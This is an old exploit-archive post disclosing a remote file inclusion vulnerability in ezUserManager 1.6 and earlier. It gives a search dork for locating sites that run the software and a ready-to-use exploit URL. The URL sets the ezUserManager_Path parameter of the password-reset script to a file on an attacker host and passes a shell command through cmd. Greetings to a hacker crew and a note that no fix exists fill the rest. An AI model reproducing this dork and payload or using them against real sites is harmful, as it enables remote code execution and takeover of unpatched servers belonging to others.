ezUserManager <= 1.6 Remote File Inclusion Vulnerability

2006-05-15 00:00:00

Title : ezUserManager <= v1.6 Remote File Inclusion Vulnerability
-
URL : http://www.ezusermanager.com/
-
Dork : "powered by ezUserManager"
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls

#

Fixes

No fixes

In order to submit a new fix you need to be registered.